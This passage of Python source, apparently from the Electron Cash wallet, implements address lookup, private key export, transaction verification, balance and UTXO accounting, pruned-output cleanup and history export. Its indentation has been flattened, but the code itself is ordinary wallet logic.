if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map and
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
        '''Convenience method equivalent to Blockchain.get_hash(), except our
        version returns None instead of NULL_HASH_HEX on a 'not found' header.'''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
        """Effect of tx on address."""
        assert isinstance(address, Address)
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
        # subtract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
def get_wallet_delta(self, tx):
""" effect of tx on wallet """
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
d = self.txo.get(item['prevout_hash'], {}).get(addr, [])
for n, v, cb in d:
if n == item['prevout_n']:
value = v
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
return is_relevant, is_mine, v, fee
def get_tx_info(self, tx):
is_relevant, is_mine, v, fee = self.get_wallet_delta(tx)
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
else:
status = _('Not verified')
else:
status = _('Unconfirmed')
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
status = _("Unsigned") if s == 0 else _('Partially signed') + ' (%d/%d)'%(s,r)
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
return tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin':txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'slp_token':self.slp.token_info_for_txo(txo), # (token_id_hex, qty) tuple or None
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
if (isInvoice):
confirmed_only = True
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only, exclude_slp=True)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
exclude_slp skips coins that also have SLP tokens on them. This defaults
to True in EC 4.0.10+ in order to prevent inadvertently burning tokens.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
len_before = len(coins)
for x in utxos.values():
if exclude_slp and x['slp_token']:
continue
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_change_addresses(self):
''' Reimplemented in subclasses for wallets that have a change address set/derivation path. '''
return []
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs! Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
''' Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets. '''
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txin):
                prevout_hash = txin['prevout_hash']
                prevout_n = txin['prevout_n']
ser = prevout_hash + ':%d'%prevout_n
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
# Unconditionally invoke the SLP handler. Note that it is a fast &
# cheap no-op if this tx's outputs[0] is not an SLP script.
self.slp.add_tx(tx_hash, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
try: self.txi.pop(tx_hash)
except KeyError: self.print_error("tx was not in input history", tx_hash)
try: self.txo.pop(tx_hash)
except KeyError: self.print_error("tx was not in output history", tx_hash)
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
# inform slp subsystem as well
self.slp.rm_tx(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
if self.network and self.network.callback_listener_count("payment_received") > 0:
for _, addr, _ in tx.outputs():
status = self.get_request_status(addr) # returns PR_UNKNOWN quickly if addr has no requests, otherwise returns tuple
if status != PR_UNKNOWN:
status = status[0] # unpack status from tuple
self.network.trigger_callback('payment_received', self, addr, status)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
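        # Descriptive note: `history` is sorted newest-first (by txpos, reverse),
        # so we attach the running balance as of each tx by starting from the
        # current total and subtracting each tx's delta as we walk backwards.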
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append((tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
        allotment for this function call. (The reason the fee calc can take a
        long time is that for some pathological tx's it is very slow to calculate
        the fee, as it involves deserializing the prevout_tx from the wallet for
        each input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
        code. Note that the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
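        # Illustrative usage sketch (e.g. from the console; argument values are
        # hypothetical):
        #   hist = wallet.export_history(show_addresses=True,
        #                                fee_calc_timeout=5.0,
        #                                progress_callback=lambda p: print(f'{p:.0%}'))
        # returns a list of dicts with keys such as 'txid', 'value', 'fee',
        # 'balance', 'date' and 'label'.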
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
        # *not* want to deserialize tx's in wallet.transactions since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
            because of the Python lists, dicts, etc. they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab history
h = self.get_history(domain, reverse=True)
out = []
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
